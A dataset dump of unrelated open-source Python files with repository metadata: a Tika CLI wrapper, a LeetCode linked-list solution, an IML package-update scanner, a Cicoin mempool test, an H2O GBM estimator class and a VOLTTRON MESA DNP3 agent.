3e1d71ccb2a67c62429d91cfe09f36fe23936caf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import logging
from os import environ
from json import loads
from subprocess import Popen, PIPE
logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
def byte2json(b):
doc = loads(b.decode("utf-8").replace("'", '"'))
if doc[0]["X-TIKA:content"]:
return doc[0]["X-TIKA:content"]
else:
return doc
def handle(req):
"""handle a request to the function
Args:
req (str): request body
"""
env = environ.copy()
p = Popen([
"java", "-cp",
"{}".format(env['CLASSPATH']),
"org.apache.tika.cli.TikaCLI",
"-J", "-t",
"{}".format(req)], stdout=PIPE, stderr=PIPE, env=env)
out, err = p.communicate()
data = []
if len(out) > 0:
data.append(byte2json(out))
if len(out) < 1 and len(err) > 0:
data.append({"error": "{}".format(err), "url": "{}".format(req)})
return "\n\n".join(data).rstrip()
| 24.358974
| 73
| 0.569474
|
4a01fdeeb926bfea9e93e0a1d6ef9862c346619f
| 1,602
|
py
|
Python
|
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | 2
|
2021-03-14T11:38:26.000Z
|
2021-03-14T11:38:30.000Z
|
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | null | null | null |
medium/86-partition-list.py
|
wanglongjiang/leetcode
|
c61d2e719e81575cfb5bde9d64e15cee7cf01ef3
|
[
"MIT"
] | 1
|
2022-01-17T19:33:23.000Z
|
2022-01-17T19:33:23.000Z
|
'''
分隔链表
给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。
你应当 保留 两个分区中每个节点的初始相对位置。
'''
from typing import List
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
'''
思路:从头搜索,所有找到的小于x的节点,都从原链表删除,加入链表lessLi。
遍历一次之后,所有小于x的节点都按照原顺序处于lessLi中,将lessLi与原链表连结起来
时间复杂度:O(n),只需要遍历一次链表
'''
class Solution:
def partition(self, head: ListNode, x: int) -> ListNode:
lessHead = ListNode() # 新的头,简化逻辑
lessTail = lessHead
pre, p = ListNode(), head
pre.next = p
head = pre # head也指向新的头,简化逻辑
while p:
if p.val < x: # 一次遍历后,将所有小于x的节点链接到lessHead后面
pre.next = p.next
lessTail.next = p
lessTail = p
p.next = None
p = pre.next
else:
pre = p
p = p.next
lessTail.next = head.next # 两个链表链接起来
return lessHead.next
def fromList(li: List[int]):
head = None
tail = head
for item in li:
if head is None:
head = ListNode(item)
tail = head
else:
tail.next = ListNode(item)
tail = tail.next
return head
def toList(listNode: ListNode):
if listNode is None:
return []
else:
li = []
while listNode is not None:
li.append(listNode.val)
listNode = listNode.next
return li
s = Solution()
print(toList(s.partition(fromList([1, 4, 3, 2, 5, 2]), 3)))
print(toList(s.partition(fromList([2, 1]), 2)))
| 22.56338
| 68
| 0.54432
|
4a01fe9133d324ce02652d84e899ca1f2953cf4a
| 4,258
|
py
|
Python
|
chroma_core/services/lustre_audit/update_scan.py
|
intel-hpdd/-intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 52
|
2018-09-13T03:26:23.000Z
|
2022-03-25T16:51:37.000Z
|
chroma_core/services/lustre_audit/update_scan.py
|
intel-hpdd/-intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 1,264
|
2018-06-15T19:50:57.000Z
|
2022-03-28T08:19:04.000Z
|
chroma_core/services/lustre_audit/update_scan.py
|
whamcloud/intel-manager-for-lustre
|
f8a6f61205b42cc62f4bbcb8d81214ad4f215cd6
|
[
"MIT"
] | 27
|
2018-06-18T08:51:59.000Z
|
2022-03-16T15:35:34.000Z
|
#!/usr/bin/env python
# Copyright (c) 2020 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
from itertools import chain
from chroma_core.services import log_register
from chroma_core.models.host import ManagedHost
from chroma_core.services.job_scheduler import job_scheduler_notify
from iml_common.lib.date_time import IMLDateTime
from iml_common.lib.package_version_info import VersionInfo
log = log_register(__name__)
class UpdateScan(object):
def __init__(self):
self.audited_mountables = {}
self.host = None
self.host_data = None
def is_valid(self):
try:
assert isinstance(self.host_data, dict)
assert "mounts" in self.host_data
assert "metrics" in self.host_data
assert "resource_locations" in self.host_data
# TODO: more thorough validation
return True
except AssertionError:
return False
def audit_host(self):
self.update_packages(self.host_data.get("packages"))
def run(self, host_id, host_data):
host = ManagedHost.objects.get(pk=host_id)
self.started_at = IMLDateTime.parse(host_data["started_at"])
self.host = host
self.host_data = host_data
log.debug("UpdateScan.run: %s" % self.host)
self.audit_host()
# Compatibility with pre-4.1 IML upgrades
def update_packages(self, package_report):
if not package_report:
# Packages is allowed to be None
# (means is not the initial message, or there was a problem talking to RPM or yum)
return
# An update is required if:
# * A package is installed on the storage server for which there is a more recent version
# available on the manager
# or
# * A package is available on the manager, and specified in the server's profile's list of
# packages, but is not installed on the storage server.
def _version_info_list(package_data):
return [VersionInfo(*package) for package in package_data]
def _updates_available(installed_versions, available_versions):
# versions are of form (EPOCH, VERSION, RELEASE, ARCH)
# Map of arch to highest installed version
max_installed_version = {}
for installed_info in installed_versions:
max_inst = max_installed_version.get(installed_info.arch, None)
if max_inst is None or installed_info > max_inst:
max_installed_version[installed_info.arch] = installed_info
for available_info in available_versions:
max_inst = max_installed_version.get(available_info.arch, None)
if max_inst is not None and available_info > max_inst:
log.debug("Update available: %s > %s" % (available_info, max_inst))
return True
return False
updates = False
repos = package_report.keys()
for package_name in set(chain(self.host.server_profile.base_packages, self.host.server_profile.packages)):
package_data = {}
for repo in repos:
try:
package_data = package_report[repo][package_name]
except KeyError:
continue
break
if not package_data:
log.warning("Required Package %s not available for %s" % (package_name, self.host))
continue
if not package_data["installed"]:
log.info("Update available (not installed): %s on %s" % (package_name, self.host))
updates = True
break
if _updates_available(
_version_info_list(package_data["installed"]), _version_info_list(package_data["available"])
):
log.info("Update needed: %s on %s" % (package_name, self.host))
updates = True
break
log.info("update_packages(%s): updates=%s" % (self.host, updates))
job_scheduler_notify.notify(self.host, self.started_at, {"needs_update": updates})
| 37.681416
| 114
| 0.62635
|
4a01fef7ca6d7a770a883652bd2f5f384268c736
| 2,906
|
py
|
Python
|
test/functional/mempool_resurrect.py
|
cicxcoin/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 3
|
2020-06-19T11:21:43.000Z
|
2021-02-16T16:29:13.000Z
|
test/functional/mempool_resurrect.py
|
Madurajaya/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 1
|
2020-04-29T20:15:13.000Z
|
2020-04-29T20:15:13.000Z
|
test/functional/mempool_resurrect.py
|
Madurajaya/cicoin
|
b48b11574ae38ae063670a755b9d50ef6960e1e8
|
[
"MIT"
] | 4
|
2020-01-25T06:31:23.000Z
|
2022-02-28T05:36:12.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Cicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import CicoinTestFramework
from test_framework.util import assert_equal
class MempoolCoinbaseTest(CicoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [self.nodes[0].getblockhash(n) for n in range(1, 4)]
coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
spends1_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]
spends1_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.98) for txid in spends1_id]
spends2_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert tx["confirmations"] > 0
# Use invalidateblock to re-org back
for node in self.nodes:
node.invalidateblock(blocks[0])
# All txns should be back in mempool with 0 confirmations
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert tx["confirmations"] == 0
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert tx["confirmations"] > 0
if __name__ == '__main__':
MempoolCoinbaseTest().main()
| 40.929577
| 123
| 0.674123
|
4a0200a9822e8b4649bb305ce78cf281e6d3a6c9
| 17,492
|
py
|
Python
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 406
|
2015-01-20T03:08:53.000Z
|
2022-03-31T20:59:07.000Z
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 2,031
|
2015-01-05T21:35:45.000Z
|
2022-03-29T21:44:36.000Z
|
services/core/DNP3Agent/dnp3/mesa/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 219
|
2015-01-20T14:53:57.000Z
|
2022-03-06T00:37:41.000Z
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2018, 8minutenergy / Kisensum.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither 8minutenergy nor Kisensum, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by 8minutenergy or Kisensum.
# }}}
import logging
import sys
from volttron.platform.agent import utils
from volttron.platform.vip.agent import RPC
from dnp3.base_dnp3_agent import BaseDNP3Agent
from dnp3.points import DNP3Exception
from dnp3 import DEFAULT_LOCAL_IP, DEFAULT_PORT
from dnp3 import DEFAULT_POINT_TOPIC, DEFAULT_OUTSTATION_STATUS_TOPIC
from dnp3 import PUBLISH, PUBLISH_AND_RESPOND
from dnp3.mesa.functions import DEFAULT_FUNCTION_TOPIC, ACTION_PUBLISH_AND_RESPOND
from dnp3.mesa.functions import FunctionDefinitions, Function, FunctionException
__version__ = '1.1'
utils.setup_logging()
_log = logging.getLogger(__name__)
class MesaAgent(BaseDNP3Agent):
"""
MesaAgent is a VOLTTRON agent that handles MESA-ESS DNP3 outstation communications.
MesaAgent models a DNP3 outstation, communicating with a DNP3 master.
For further information about this agent, MESA-ESS, and DNP3 communications, please
see the VOLTTRON MESA-ESS agent specification, which can be found in VOLTTRON readthedocs
at http://volttron.readthedocs.io/en/develop/specifications/mesa_agent.html.
This agent can be installed from a command-line shell as follows:
$ export VOLTTRON_ROOT=<volttron github install directory>
$ cd $VOLTTRON_ROOT
$ source services/core/DNP3Agent/install_mesa_agent.sh
That file specifies a default agent configuration, which can be overridden as needed.
"""
def __init__(self, functions=None, function_topic='', outstation_status_topic='',
all_functions_supported_by_default=False,
local_function_definitions_path=None, function_validation=False, **kwargs):
"""Initialize the MESA agent."""
super(MesaAgent, self).__init__(**kwargs)
self.functions = functions
self.function_topic = function_topic
self.outstation_status_topic = outstation_status_topic
self.all_functions_supported_by_default = all_functions_supported_by_default
self.function_validation = function_validation
# Update default config
self.default_config.update({
'functions': functions,
'function_topic': function_topic,
'outstation_status_topic': outstation_status_topic,
'all_functions_supported_by_default': all_functions_supported_by_default,
'function_validation': function_validation
})
# Update default config in config store.
self.vip.config.set_default('config', self.default_config)
self.function_definitions = None
self._local_function_definitions_path = local_function_definitions_path
self._current_functions = dict() # {function_id: Function}
self._current_block = dict() # {name: name, index: index}
self._selector_block = dict() # {selector_block_point_name: {selector_index: [Step]}}
self._edit_selectors = list() # [{name: name, index: index}]
def _configure_parameters(self, contents):
"""
Initialize/Update the MesaAgent configuration.
See also the superclass version of this method, which does most of the initialization.
MesaAgent configuration parameters:
functions: (string) A JSON structure of function definitions to be loaded.
function_topic: (string) Message bus topic to use when publishing MESA-ESS functions.
Default: mesa/function.
all_functions_supported_by_default: (boolean) When deciding whether to reject points for unsupported
functions, ignore the values of their 'supported' points: simply treat all functions as
supported.
Default: False.
"""
config = super(MesaAgent, self)._configure_parameters(contents)
self.functions = config.get('functions', {})
self.function_topic = config.get('function_topic', DEFAULT_FUNCTION_TOPIC)
self.all_functions_supported_by_default = config.get('all_functions_supported_by_default', False)
self.function_validation = config.get('function_validation', False)
_log.debug('MesaAgent configuration parameters:')
_log.debug('\tfunctions type={}'.format(type(self.functions)))
_log.debug('\tfunction_topic={}'.format(self.function_topic))
_log.debug('\tall_functions_supported_by_default={}'.format(bool(self.all_functions_supported_by_default)))
_log.debug('\tfuntion_validation={}'.format(bool(self.function_validation)))
self.load_function_definitions()
self.supported_functions = []
# Un-comment the next line to do more detailed validation and print definition statistics.
# validate_definitions(self.point_definitions, self.function_definitions)
def load_function_definitions(self):
"""Populate the FunctionDefinitions repository from JSON in the config store."""
_log.debug('Loading MESA function definitions')
try:
self.function_definitions = FunctionDefinitions(self.point_definitions)
self.function_definitions.load_functions(self.functions['functions'])
except (AttributeError, TypeError) as err:
if self._local_function_definitions_path:
_log.warning("Attempting to load Function Definitions from local path.")
self.function_definitions = FunctionDefinitions(
self.point_definitions,
function_definitions_path=self._local_function_definitions_path)
else:
raise DNP3Exception("Failed to load Function Definitions from config store: {}".format(err))
@RPC.export
def reset(self):
"""Reset the agent's internal state, emptying point value caches. Used during iterative testing."""
super(MesaAgent, self).reset()
self._current_functions = dict()
self._current_block = dict()
self._selector_block = dict()
self._edit_selectors = list()
@RPC.export
def get_selector_block(self, block_name, index):
try:
return {step.definition.name: step.as_json() for step in self._selector_block[block_name][index]}
except KeyError:
_log.debug('Have not received data for Selector Block {} at Edit Selector {}'.format(block_name, index))
return None
def _process_point_value(self, point_value):
"""
A PointValue was received from the Master. Process its payload.
:param point_value: A PointValue.
"""
try:
point_val = super(MesaAgent, self)._process_point_value(point_value)
if point_val:
if point_val.point_def.is_selector_block:
self._current_block = {
'name': point_val.point_def.name,
'index': float(point_val.value)
}
_log.debug('Starting to receive Selector Block {name} at Edit Selector {index}'.format(
**self._current_block
))
# Publish mesa/point if the point action is PUBLISH or PUBLISH_AND_RESPOND
if point_val.point_def.action in (PUBLISH, PUBLISH_AND_RESPOND):
self.publish_point_value(point_value)
self.update_function_for_point_value(point_val)
if self._current_functions:
for current_func_id, current_func in self._current_functions.items():
# if step action is ACTION_ECHO or ACTION_ECHO_AND_PUBLISH
if current_func.has_input_point():
self.update_input_point(
self.get_point_named(current_func.input_point_name()),
point_val.unwrapped_value()
)
# if step is the last curve or schedule step
if self._current_block and point_val.point_def == current_func.definition.last_step.point_def:
current_block_name = self._current_block['name']
self._selector_block.setdefault(current_block_name, dict())
self._selector_block[current_block_name][self._current_block['index']] = current_func.steps
_log.debug('Saved Selector Block {} at Edit Selector {}: {}'.format(
self._current_block['name'],
self._current_block['index'],
self.get_selector_block(self._current_block['name'], self._current_block['index'])
))
self._current_block = dict()
# if step reference to a curve or schedule function
func_ref = current_func.last_step.definition.func_ref
if func_ref:
block_name = self.function_definitions[func_ref].first_step.name
block_index = float(point_val.value)
if not self._selector_block.get(block_name, dict()).get(block_index, None):
error_msg = 'Have not received data for Selector Block {} at Edit Selector {}'
raise DNP3Exception(error_msg.format(block_name, block_index))
current_edit_selector = {
'name': block_name,
'index': block_index
}
if current_edit_selector not in self._edit_selectors:
self._edit_selectors.append(current_edit_selector)
# if step action is ACTION_PUBLISH, ACTION_ECHO_AND_PUBLISH, or ACTION_PUBLISH_AND_RESPOND
if current_func.publish_now():
self.publish_function_step(current_func.last_step)
# if current function is completed
if current_func.complete:
self._current_functions.pop(current_func_id)
self._edit_selectors = list()
except (DNP3Exception, FunctionException) as err:
self._current_functions = dict()
self._edit_selectors = list()
if type(err) == DNP3Exception:
raise DNP3Exception('Error processing point value: {}'.format(err))
def update_function_for_point_value(self, point_value):
"""Add point_value to the current Function if appropriate."""
error_msg = None
current_functions = self.current_function_for(point_value.point_def)
if not current_functions:
return None
for function_id, current_function in current_functions.items():
try:
if point_value.point_def.is_array_point:
self.update_array_for_point(point_value)
current_function.add_point_value(point_value,
current_array=self._current_array,
function_validation=self.function_validation)
except (DNP3Exception, FunctionException) as err:
current_functions.pop(function_id)
if type(err) == DNP3Exception:
error_msg = err
if error_msg and not current_functions:
raise DNP3Exception('Error updating function: {}'.format(error_msg))
def current_function_for(self, new_point_def):
"""A point was received. Return the current Function, updating it if necessary."""
new_point_function_def = self.function_definitions.get_fdef_for_pdef(new_point_def)
if new_point_function_def is None:
return None
if self._current_functions:
current_funcs = dict()
for func_def in new_point_function_def:
val = self._current_functions.pop(func_def.function_id, None)
if val:
current_funcs.update({func_def.function_id: val})
self._current_functions = current_funcs
else:
for func_def in new_point_function_def:
if not self.all_functions_supported_by_default and not func_def.supported:
raise DNP3Exception('Received a point for unsupported {}'.format(func_def))
self._current_functions[func_def.function_id] = Function(func_def)
return self._current_functions
def update_input_point(self, point_def, value):
"""
Update an input point. This may send its PointValue to the Master.
:param point_def: A PointDefinition.
:param value: A value to send (unwrapped simple data type, or else a list/array).
"""
super(MesaAgent, self).update_input_point(point_def, value)
if type(value) != list:
# Side-effect: If it's a Support point for a Function, update the Function's "supported" property.
func = self.function_definitions.support_point_names().get(point_def.name, None)
if func is not None and func.supported != value:
_log.debug('Updating supported property to {} in {}'.format(value, func))
func.supported = value
def publish_function_step(self, step_to_send):
"""A Function Step was received from the DNP3 Master. Publish the Function."""
function_to_send = step_to_send.function
points = {step.definition.name: step.as_json() for step in function_to_send.steps}
for edit_selector in self._edit_selectors:
block_name = edit_selector['name']
index = edit_selector['index']
try:
points[block_name][index] = self.get_selector_block(block_name, index)
except (KeyError, TypeError):
points[block_name] = {
index: self.get_selector_block(block_name, index)
}
msg = {
"function_id": function_to_send.definition.function_id,
"function_name": function_to_send.definition.name,
"points": points
}
if step_to_send.definition.action == ACTION_PUBLISH_AND_RESPOND:
msg["expected_response"] = step_to_send.definition.response
_log.info('Publishing MESA {} message {}'.format(function_to_send, msg))
self.publish_data(self.function_topic, msg)
def mesa_agent(config_path, **kwargs):
"""
Parse the MesaAgent configuration. Return an agent instance created from that config.
:param config_path: (str) Path to a configuration file.
:returns: (MesaAgent) The MESA agent
"""
try:
config = utils.load_config(config_path)
except Exception:
config = {}
return MesaAgent(points=config.get('points', []),
functions=config.get('functions', []),
point_topic=config.get('point_topic', DEFAULT_POINT_TOPIC),
function_topic=config.get('function_topic', DEFAULT_FUNCTION_TOPIC),
outstation_status_topic=config.get('outstation_status_topic', DEFAULT_OUTSTATION_STATUS_TOPIC),
local_ip=config.get('local_ip', DEFAULT_LOCAL_IP),
port=config.get('port', DEFAULT_PORT),
outstation_config=config.get('outstation_config', {}),
all_functions_supported_by_default=config.get('all_functions_supported_by_default', False),
function_validation=config.get('function_validation', False),
**kwargs)
def main():
"""Main method called to start the agent."""
utils.vip_main(mesa_agent, identity='mesaagent', version=__version__)
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 49.412429
| 119
| 0.641665
|
4a0202127b085e8bb7120c42fe19074e81ce9949
| 2,936
|
py
|
Python
|
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
uniflocpy/uMultiphaseFlow/friction_Bratland.py
|
Shabonasar/unifloc
|
1f12d6b4110a9ff0e10817560ad99d55c9133954
|
[
"MIT"
] | null | null | null |
"""
Модуль для рассчета коэффициента трения
по данным книги:
Bratland O. Pipe flow 1: single-phase flow assurance
//Fonte: http://www.drbratland.com/download-two-free-books-on-flow-assurance. – 2009.
"""
import scipy.optimize as sp # модуль для решения уравения
import math
class Friction():
"""
Модуль-класс для расчета коэффициента трения f
в зависимости от числа Рейнольдса, абс. шероховатости и диаметра трубы.
"""
def __init__(self):
"""
Консруктор класса
:param number_re: безразмерное число Рейнольдса
:param epsilon_m: абсолюная шероховатость
:param d_m: внутренний диаметр трубы
"""
self.number_re = None
self.absolute_roughness_m = None
self.d_m = None
self.relative_roughness = None # относительная шероховатость
self.f = None # итоговый коэффициент трения
self.u_s = 1 # подстроечный параметр для сбивки к экспериментальным исследованиям
def __correlation__(self, f):
"""
Основная корреляция Ove Bartland для расчета коэффициента трения
При решении уравнения с помощью fsolve результат сохраняется в атрибуте
:param f: коэффициент трения
:return: разница между расчитанным f и приближенным f для примения fsolve
"""
self.f = f
in_log10_part_first = ((1.547 / self.number_re / self.f ** (1/2))**(0.9445 * self.u_s))
in_log10_part_second = ((self.absolute_roughness_m / 3.7 / self.d_m) ** self.u_s)
result = (1 / ( - 2 / self.u_s * math.log10(in_log10_part_first + in_log10_part_second)))**2
return result - self.f
def calc_f(self, number_re, epsilon_m, d_m):
"""
Метод для расчета коэффициента трения
:param number_re: Число Рейнольдса
:param epsilon_m: Абсолютная шероховатость
:param d_m: Внутрениний диаметр трубы
:return: коэффициент трения f
"""
self.number_re = number_re
self.absolute_roughness_m = epsilon_m
self.d_m = d_m
self.relative_roughness = self.absolute_roughness_m / self.d_m
if self.number_re <= 2300: # Laminar
self.f = 64 / self.number_re
if 2300 < self.number_re <= 3100: # Turbulent
p1 = 64 / 2300
p2 = 0.04
self.f = p1 + (p2 - p1) / (3100 - 2300) * (self.number_re - 2300) # TODO должна быть прямая линия
if 3100 < self.number_re <= 20000:
mistake = sp.fsolve(self.__correlation__, 0.02) # TODO разобраться с выбором начального приближения
p3 = float(self.f)
p2 = 0.04
self.f = p2 + (p3 - p2) / (20000 - 3100) * (self.number_re - 3100) # TODO должна быть прямая линия
if self.number_re > 20000:
mistake = sp.fsolve(self.__correlation__, 0.02)
self.f = float(self.f) # fsolve выдает numpy array, перевод в float
return self.f
| 38.631579
| 112
| 0.633174
|
4a02022d31dc93408706999271615cde7b5255e8
| 6,518
|
py
|
Python
|
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | null | null | null |
h2o-py/h2o/estimators/gbm.py
|
Bhanuprakash-ch/h2o-3
|
c75bc5d2dc644cc8c09df755185a4cc6e34e0d1a
|
[
"Apache-2.0"
] | 1
|
2020-01-22T19:10:37.000Z
|
2020-01-22T19:10:37.000Z
|
from .estimator_base import *
class H2OGradientBoostingEstimator(H2OEstimator):
"""
Builds gradient boosted classification trees, and gradient boosted regression trees on
a parsed data set. The default distribution function will guess the model type based on
the response column type run properly the response column must be an numeric for
"gaussian" or an enum for "bernoulli" or "multinomial".
Parameters
----------
model_id : str, optional
The unique id assigned to the resulting model. If none is given, an id will
automatically be generated.
distribution : str
The distribution function of the response. Must be "AUTO", "bernoulli",
"multinomial", "poisson", "gamma", "tweedie" or "gaussian"
tweedie_power : float
Tweedie power (only for Tweedie distribution, must be between 1 and 2)
ntrees : int
A non-negative integer that determines the number of trees to grow.
max_depth : int
Maximum depth to grow the tree.
min_rows : int
Minimum number of rows to assign to terminal nodes.
learn_rate : float
A value from 0.0 to 1.0
nbins : int
For numerical columns (real/int), build a histogram of (at least) this many bins, then
split at the best point.
nbins_top_level : int
For numerical columns (real/int), build a histogram of (at most) this many bins at the
root level, then decrease by factor of two per level.
nbins_cats : int
For categorical columns (factors), build a histogram of this many bins, then split at
the best point. Higher values can lead to more overfitting.
balance_classes : bool
logical, indicates whether or not to balance training data class counts via
over/under-sampling (for imbalanced data)
max_after_balance_size : float
Maximum relative size of the training data after balancing class counts
(can be less than 1.0). Ignored if balance_classes is False, which is the
default behavior.
seed : int
Seed for random numbers (affects sampling when balance_classes=T)
build_tree_one_node : bool
Run on one node only; no network overhead but fewer cpus used.
Suitable for small datasets.
nfolds : int, optional
Number of folds for cross-validation. If nfolds >= 2, then validation must
remain empty.
fold_assignment : str
Cross-validation fold assignment scheme, if fold_column is not specified.
Must be "AUTO", "Random" or "Modulo"
keep_cross_validation_predictions : bool
Whether to keep the predictions of the cross-validation models
score_each_iteration : bool
Attempts to score each tree.
Returns
-------
A new H2OGradientBoostedEstimator object.
"""
def __init__(self, model_id=None, distribution=None, tweedie_power=None, ntrees=None,
max_depth=None, min_rows=None, learn_rate=None, nbins=None,
nbins_top_level=None, nbins_cats=None, balance_classes=None,
max_after_balance_size=None, seed=None, build_tree_one_node=None,
nfolds=None, fold_assignment=None, keep_cross_validation_predictions=None,
score_each_iteration=None, checkpoint=None):
super(H2OGradientBoostingEstimator, self).__init__()
self._parms = locals()
self._parms = {k:v for k,v in self._parms.iteritems() if k!="self"}
@property
def distribution(self):
return self._parms["distribution"]
@distribution.setter
def distribution(self, value):
self._parms["distribution"] = value
@property
def tweedie_power(self):
return self._parms["tweedie_power"]
@tweedie_power.setter
def tweedie_power(self, value):
self._parms["tweedie_power"] = value
@property
def ntrees(self):
return self._parms["ntrees"]
@ntrees.setter
def ntrees(self, value):
self._parms["ntrees"] = value
@property
def max_depth(self):
return self._parms["max_depth"]
@max_depth.setter
def max_depth(self, value):
self._parms["max_depth"] = value
@property
def min_rows(self):
return self._parms["min_rows"]
@min_rows.setter
def min_rows(self, value):
self._parms["min_rows"] = value
@property
def learn_rate(self):
return self._parms["learn_rate"]
@learn_rate.setter
def learn_rate(self, value):
self._parms["learn_rate"] = value
@property
def nbins(self):
return self._parms["nbins"]
@nbins.setter
def nbins(self, value):
self._parms["nbins"] = value
@property
def nbins_top_level(self):
return self._parms["nbins_top_level"]
@nbins_top_level.setter
def nbins_top_level(self, value):
self._parms["nbins_top_level"] = value
@property
def nbins_cats(self):
return self._parms["nbins_cats"]
@nbins_cats.setter
def nbins_cats(self, value):
self._parms["nbins_cats"] = value
@property
def balance_classes(self):
return self._parms["balance_classes"]
@balance_classes.setter
def balance_classes(self, value):
self._parms["balance_classes"] = value
@property
def max_after_balance_size(self):
return self._parms["max_after_balance_size"]
@max_after_balance_size.setter
def max_after_balance_size(self, value):
self._parms["max_after_balance_size"] = value
@property
def seed(self):
return self._parms["seed"]
@seed.setter
def seed(self, value):
self._parms["seed"] = value
@property
def build_tree_one_node(self):
return self._parms["build_tree_one_node"]
@build_tree_one_node.setter
def build_tree_one_node(self, value):
self._parms["build_tree_one_node"] = value
@property
def nfolds(self):
return self._parms["nfolds"]
@nfolds.setter
def nfolds(self, value):
self._parms["nfolds"] = value
@property
def fold_assignment(self):
return self._parms["fold_assignment"]
@fold_assignment.setter
def fold_assignment(self, value):
self._parms["fold_assignment"] = value
@property
def keep_cross_validation_predictions(self):
return self._parms["keep_cross_validation_predictions"]
@keep_cross_validation_predictions.setter
def keep_cross_validation_predictions(self, value):
self._parms["keep_cross_validation_predictions"] = value
@property
def score_each_iteration(self):
return self._parms["score_each_iteration"]
@score_each_iteration.setter
def score_each_iteration(self, value):
self._parms["score_each_iteration"] = value
@property
def checkpoint(self):
return self._parms["checkpoint"]
@checkpoint.setter
def checkpoint(self, value):
self._parms["checkpoint"] = value
| 29.762557
| 90
| 0.722001
|
4a0202dd624cac1885a6578b14d9ed0e64291f49
| 30,957
|
py
|
Python
|
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | null | null | null |
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | 1
|
2021-11-30T01:19:59.000Z
|
2021-11-30T01:19:59.000Z
|
tests/test_vlan.py
|
akokhan/sonic-swss
|
c7d8c2b77171b0dcbbb962306697601d0c2b73fa
|
[
"Apache-2.0"
] | 2
|
